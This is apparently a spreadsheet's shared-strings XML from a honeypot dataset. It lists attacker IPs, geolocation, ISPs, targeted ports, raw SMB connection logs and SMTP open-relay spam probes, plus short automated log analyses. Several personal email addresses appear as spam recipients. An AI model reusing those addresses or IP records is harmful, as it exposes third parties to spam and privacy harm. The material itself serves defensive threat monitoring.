  <si>
    <t>Hanover (Cedar Knolls)</t>
  </si>
  <si>
    <t>5098805</t>
  </si>
  <si>
    <t>07927</t>
  </si>
  <si>
    <t>40.8218</t>
  </si>
  <si>
    <t>-74.45</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2d4f:8616</t>
  </si>
  <si>
    <t>There is insufficient log data provided to analyze any possible malicious activity.</t>
  </si>
  <si>
    <t>e075d8ba6e3b648f479483bce4d25647</t>
  </si>
  <si>
    <t>175.180.142.157</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;26253&amp;&amp;5443&amp;&amp;48351&amp;&amp;NA</t>
  </si>
  <si>
    <t>25.0423</t>
  </si>
  <si>
    <t>121.567</t>
  </si>
  <si>
    <t>4780</t>
  </si>
  <si>
    <t>Digital United Inc.</t>
  </si>
  <si>
    <t>New Century InfoComm Tech. Co., Ltd.</t>
  </si>
  <si>
    <t>::ffff:afb4:8e9d</t>
  </si>
  <si>
    <t>969d52389709fbe1845909df0be94af8</t>
  </si>
  <si>
    <t>117.221.211.207</t>
  </si>
  <si>
    <t>::ffff:75dd:d3cf</t>
  </si>
  <si>
    <t>631329c63e2e86c6e3f38fbca7aa6eb8</t>
  </si>
  <si>
    <t>23.92.78.243</t>
  </si>
  <si>
    <t>23-92-78-243.static.hvvc.us</t>
  </si>
  <si>
    <t>Richmond</t>
  </si>
  <si>
    <t>Staten Island</t>
  </si>
  <si>
    <t>5139568</t>
  </si>
  <si>
    <t>10311</t>
  </si>
  <si>
    <t>40.6032</t>
  </si>
  <si>
    <t>-74.1819</t>
  </si>
  <si>
    <t>29802</t>
  </si>
  <si>
    <t>HVC-AS</t>
  </si>
  <si>
    <t>HIVELOCITY, Inc.</t>
  </si>
  <si>
    <t>HIVELOCITY, Inc</t>
  </si>
  <si>
    <t>2013-04-16 19:52:56</t>
  </si>
  <si>
    <t>2026-04-15 23:59:59</t>
  </si>
  <si>
    <t>2025-04-11 05:01:07</t>
  </si>
  <si>
    <t>['ns1.hivelocity.net', 'ns2.hivelocity.net']</t>
  </si>
  <si>
    <t>::ffff:175c:4ef3</t>
  </si>
  <si>
    <t>345dafc501a348c48462bb9eda265916</t>
  </si>
  <si>
    <t>59.88.55.74</t>
  </si>
  <si>
    <t>::ffff:3b58:374a</t>
  </si>
  <si>
    <t>1b0bbbdc537be94bede8b76b81af95ce</t>
  </si>
  <si>
    <t>139.218.108.176</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>::ffff:8bda:6cb0</t>
  </si>
  <si>
    <t>18b4e3a22c738dc53b1cd49d59c653e6</t>
  </si>
  <si>
    <t>14.183.142.132</t>
  </si>
  <si>
    <t>VNPT-AS-VN</t>
  </si>
  <si>
    <t>Vnpt</t>
  </si>
  <si>
    <t>::ffff:eb7:8e84</t>
  </si>
  <si>
    <t>555f7191caff6f9a1c9e9b42b1236110</t>
  </si>
  <si>
    <t>175.211.73.152</t>
  </si>
  <si>
    <t>::ffff:afd3:4998</t>
  </si>
  <si>
    <t>d989ea2e98b752a021f4dbdfd356bffb</t>
  </si>
  <si>
    <t>117.209.18.41</t>
  </si>
  <si>
    <t>::ffff:75d1:1229</t>
  </si>
  <si>
    <t>c266911ac2ac58bce503bc53fe6b0ffc</t>
  </si>
  <si>
    <t>125.227.184.229</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-227-184-229.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;27241</t>
  </si>
  <si>
    <t>::ffff:7de3:b8e5</t>
  </si>
  <si>
    <t>e05e781ca44dc392fbff25991c32c84d</t>
  </si>
  <si>
    <t>120.56.33.244</t>
  </si>
  <si>
    <t>::ffff:7838:21f4</t>
  </si>
  <si>
    <t>b36fe3fec00068f135b7ffe814c7476e</t>
  </si>
  <si>
    <t>117.212.60.107</t>
  </si>
  <si>
    <t>::ffff:75d4:3c6b</t>
  </si>
  <si>
    <t>491a0af51d478b98c5d1eeb68c297bb9</t>
  </si>
  <si>
    <t>117.219.112.219</t>
  </si>
  <si>
    <t>::ffff:75db:70db</t>
  </si>
  <si>
    <t>84088b06af231c185d90b0ad5fd805ab</t>
  </si>
  <si>
    <t>45.165.88.42</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>Feira de Santana Municipality</t>
  </si>
  <si>
    <t>Feira de Santana</t>
  </si>
  <si>
    <t>3463478</t>
  </si>
  <si>
    <t>44000-000</t>
  </si>
  <si>
    <t>-12.2536</t>
  </si>
  <si>
    <t>-38.9601</t>
  </si>
  <si>
    <t>268659</t>
  </si>
  <si>
    <t>D. S. ALVES SERVICOS DE INTERNET</t>
  </si>
  <si>
    <t>::ffff:2da5:582a</t>
  </si>
  <si>
    <t>0c60a2d11d1a647d01844ca79177c03e</t>
  </si>
  <si>
    <t>113.193.2.43</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_SMB_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;3347&amp;&amp;445&amp;&amp;28514&amp;&amp;1433&amp;&amp;3306&amp;&amp;NA</t>
  </si>
  <si>
    <t>Noida (Bishanpura)</t>
  </si>
  <si>
    <t>28.6099</t>
  </si>
  <si>
    <t>77.3543</t>
  </si>
  <si>
    <t>45528</t>
  </si>
  <si>
    <t>Tikona Infinet Ltd.</t>
  </si>
  <si>
    <t>Tikona Digital Networks Pvt.Ltd</t>
  </si>
  <si>
    <t>2008-11-19</t>
  </si>
  <si>
    <t>TIKONAIN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,11963)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61018)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61033)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2662)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3675)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6269)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61867)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2119)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3122)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,53872)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,54342)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,58361)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,58389)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59179)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62292)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2118)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59515)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59522)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59968)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,54780)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,1576)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,55782)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6739)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,9287)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,6168)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61683)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61719)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,4636)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61061)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61082)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61576)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59102)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59160)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,59625)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2921)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3045)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3734)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,7707)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,1602)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8163)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,7935)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,9615)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,8078)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,56569)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,56635)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,57669)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62235)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,62260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,63018)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,64822)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,64828)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,65303)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,15699)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,5305)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,2027)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,5335)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,53303)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,3185)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61105)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,61950)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,60438)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,60451)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49163)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49217)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,49621)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.2.43,57318)}</t>
  </si>
  <si>
    <t>::ffff:71c1:22b</t>
  </si>
  <si>
    <t>7947ab96546b1d02bfd91c4df9063a09</t>
  </si>
  <si>
    <t>120.57.217.200</t>
  </si>
  <si>
    <t>::ffff:7839:d9c8</t>
  </si>
  <si>
    <t>075c38a71c14a9122129369c4c88f5d2</t>
  </si>
  <si>
    <t>109.63.118.187</t>
  </si>
  <si>
    <t>Southern Governorate</t>
  </si>
  <si>
    <t>Riffa</t>
  </si>
  <si>
    <t>385038</t>
  </si>
  <si>
    <t>26.13</t>
  </si>
  <si>
    <t>50.555</t>
  </si>
  <si>
    <t>51375</t>
  </si>
  <si>
    <t>STC BAHRAIN B.S.C CLOSED</t>
  </si>
  <si>
    <t>MENA-CORE</t>
  </si>
  <si>
    <t>2010-01-06</t>
  </si>
  <si>
    <t>::ffff:6d3f:76bb</t>
  </si>
  <si>
    <t>368d2e63d389d966a6c6cde69a0a4d91</t>
  </si>
  <si>
    <t>101.255.82.126</t>
  </si>
  <si>
    <t>-6.24205</t>
  </si>
  <si>
    <t>106.842</t>
  </si>
  <si>
    <t>38511</t>
  </si>
  <si>
    <t>PT Remala Abadi</t>
  </si>
  <si>
    <t>2011-03-02</t>
  </si>
  <si>
    <t>TACHYON-ID</t>
  </si>
  <si>
    <t>::ffff:65ff:527e</t>
  </si>
  <si>
    <t>78111d0d4b470074f0c6f5508e7b7675</t>
  </si>
  <si>
    <t>117.209.87.101</t>
  </si>
  <si>
    <t>::ffff:75d1:5765</t>
  </si>
  <si>
    <t>525686e725fd747658b54c96ab70ae36</t>
  </si>
  <si>
    <t>103.38.80.91</t>
  </si>
  <si>
    <t>Kwai Chung</t>
  </si>
  <si>
    <t>1819595</t>
  </si>
  <si>
    <t>22.3702</t>
  </si>
  <si>
    <t>114.13</t>
  </si>
  <si>
    <t>HK JIUJIUIDC TECHNOLOGY LIMITED</t>
  </si>
  <si>
    <t>HJTL-HK</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.38.80.91,52815)}</t>
  </si>
  <si>
    <t>::ffff:6726:505b</t>
  </si>
  <si>
    <t>Possible malicious activity is a remote connection attempt to a shared resource.
The attacker's IP address is 103.38.80.91 and the port used is 52815.
This may indicate an attempted unauthorized access or data theft. &amp;&amp; An incoming connection from an external IP address is attempting to access a shared resource on the system, which could be indicative of a potential attack or unauthorized access attempt. The source IP (103.38.80.91) may be a malicious actor trying to exploit vulnerabilities in SMB services. This activity suggests an attempt to gain unauthorized access or launch a malware spread via file-sharing.</t>
  </si>
  <si>
    <t>bada924103ef433969e7b61dc43bbbb6</t>
  </si>
  <si>
    <t>117.206.184.122</t>
  </si>
  <si>
    <t>::ffff:75ce:b87a</t>
  </si>
  <si>
    <t>3312799a201ebe898e7719f4c3a1c1d3</t>
  </si>
  <si>
    <t>59.184.59.157</t>
  </si>
  <si>
    <t>Raisen</t>
  </si>
  <si>
    <t>Begamganj</t>
  </si>
  <si>
    <t>1276621</t>
  </si>
  <si>
    <t>23.5992</t>
  </si>
  <si>
    <t>78.3406</t>
  </si>
  <si>
    <t>::ffff:3bb8:3b9d</t>
  </si>
  <si>
    <t>9e2fbc155e93b7af925f58985c0cbb06</t>
  </si>
  <si>
    <t>59.92.61.123</t>
  </si>
  <si>
    <t>::ffff:3b5c:3d7b</t>
  </si>
  <si>
    <t>e9f73b47d45b89a7e25f63db840e9d29</t>
  </si>
  <si>
    <t>117.210.187.39</t>
  </si>
  <si>
    <t>::ffff:75d2:bb27</t>
  </si>
  <si>
    <t>583179d52a5a3acd7b1a7f34f0451798</t>
  </si>
  <si>
    <t>59.98.20.113</t>
  </si>
  <si>
    <t>::ffff:3b62:1471</t>
  </si>
  <si>
    <t>3335d692d702d9fb89694d15c4444d14</t>
  </si>
  <si>
    <t>120.61.80.84</t>
  </si>
  <si>
    <t>::ffff:783d:5054</t>
  </si>
  <si>
    <t>a28ea9d5bcdf5cda8a3092dcbf96f63c</t>
  </si>
  <si>
    <t>117.233.234.7</t>
  </si>
  <si>
    <t>::ffff:75e9:ea07</t>
  </si>
  <si>
    <t>66a142f4a60628def6db7b4295599b34</t>
  </si>
  <si>
    <t>176.91.32.106</t>
  </si>
  <si>
    <t>Beyoğlu</t>
  </si>
  <si>
    <t>41.0315</t>
  </si>
  <si>
    <t>28.9748</t>
  </si>
  <si>
    <t>Turkcell Iletisim Hizmetleri A.S.</t>
  </si>
  <si>
    <t>Turkcell Iletisim Hizmetleri</t>
  </si>
  <si>
    <t>::ffff:b05b:206a</t>
  </si>
  <si>
    <t>167949c9ba40167ed588bcdbc9c2b231</t>
  </si>
  <si>
    <t>14.55.14.169</t>
  </si>
  <si>
    <t>::ffff:e37:ea9</t>
  </si>
  <si>
    <t>a64b6409b60a55d75cbc066ebd7ad69b</t>
  </si>
  <si>
    <t>125.228.142.54</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-142-54.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;36400</t>
  </si>
  <si>
    <t>::ffff:7de4:8e36</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>234d1f7fd54ed4145c6543f536d17aa3</t>
  </si>
  <si>
    <t>84.54.179.165</t>
  </si>
  <si>
    <t>Burgas</t>
  </si>
  <si>
    <t>Sozopol</t>
  </si>
  <si>
    <t>726963</t>
  </si>
  <si>
    <t>8130</t>
  </si>
  <si>
    <t>42.418</t>
  </si>
  <si>
    <t>27.6956</t>
  </si>
  <si>
    <t>29084</t>
  </si>
  <si>
    <t>Comnet Bulgaria Holding Ltd.</t>
  </si>
  <si>
    <t>ComNet Bulgaria Ltd.</t>
  </si>
  <si>
    <t>::ffff:5436:b3a5</t>
  </si>
  <si>
    <t>346078c733cebb98825f4780728bf604</t>
  </si>
  <si>
    <t>117.207.180.94</t>
  </si>
  <si>
    <t>::ffff:75cf:b45e</t>
  </si>
  <si>
    <t>fdb6fca4933335ab8669b38faa74c792</t>
  </si>
  <si>
    <t>191.7.113.89</t>
  </si>
  <si>
    <t>NA&amp;&amp;191-7-113-89.teleturbo.net.br</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;35667&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>MT</t>
  </si>
  <si>
    <t>Mato Grosso</t>
  </si>
  <si>
    <t>Tangará da Serra</t>
  </si>
  <si>
    <t>6318738</t>
  </si>
  <si>
    <t>-14.6194</t>
  </si>
  <si>
    <t>-57.4858</t>
  </si>
  <si>
    <t>264268</t>
  </si>
  <si>
    <t>TELETURBO SERVICOS DE TELECOMUNICACOES LTDA</t>
  </si>
  <si>
    <t>Teleturbo Servicos De Telecomunicacoes Ltda</t>
  </si>
  <si>
    <t>2015-02-26 00:00:00</t>
  </si>
  <si>
    <t>2026-02-26 00:00:00</t>
  </si>
  <si>
    <t>2022-11-07 00:00:00</t>
  </si>
  <si>
    <t>['20250422 DSOK', 'published']</t>
  </si>
  <si>
    <t>::ffff:bf07:7159</t>
  </si>
  <si>
    <t>7877075f64e84dce4c1a7daafd0774d1</t>
  </si>
  <si>
    <t>117.217.242.65</t>
  </si>
  <si>
    <t>::ffff:75d9:f241</t>
  </si>
  <si>
    <t>585c0c6edb66169dcf97a72509d6644c</t>
  </si>
  <si>
    <t>171.251.88.146</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>22&amp;&amp;52724&amp;&amp;3306&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>61</t>
  </si>
  <si>
    <t>Hải Dương Province</t>
  </si>
  <si>
    <t>Cẩm Giàng District</t>
  </si>
  <si>
    <t>Lai Cách</t>
  </si>
  <si>
    <t>1577958</t>
  </si>
  <si>
    <t>20.9325</t>
  </si>
  <si>
    <t>106.248</t>
  </si>
  <si>
    <t>::ffff:abfb:5892</t>
  </si>
  <si>
    <t>46c60725c81f11167e8c3474186e18a6</t>
  </si>
  <si>
    <t>196.251.92.91</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H35</t>
  </si>
  <si>
    <t>25&amp;&amp;NA&amp;&amp;58398</t>
  </si>
  <si>
    <t>Seychelles</t>
  </si>
  <si>
    <t>16</t>
  </si>
  <si>
    <t>La Rivière Anglaise</t>
  </si>
  <si>
    <t>241131</t>
  </si>
  <si>
    <t>-4.62113</t>
  </si>
  <si>
    <t>55.4522</t>
  </si>
  <si>
    <t>401109</t>
  </si>
  <si>
    <t>Zhongguancun LLC</t>
  </si>
  <si>
    <t>internet secuirty Zhongguanchun</t>
  </si>
  <si>
    <t>2017-02-07</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;dr.mitra@ukrit.uk&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;nicolaswesley625@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jonnalanford@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;w3593178@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;amandawhitmore11@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;harrygeorge_25@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;zainmazi@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;agbooladavis@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 25 Mar 2025 15:32:08 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 26 Mar 2025 05:50:55 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 30 Mar 2025 16:08:34 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 1 Apr 2025 09:20:54 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 2 Apr 2025 09:05:19 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 19:40:10 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 5 Apr 2025 04:33:24 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 5 Apr 2025 11:35:08 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
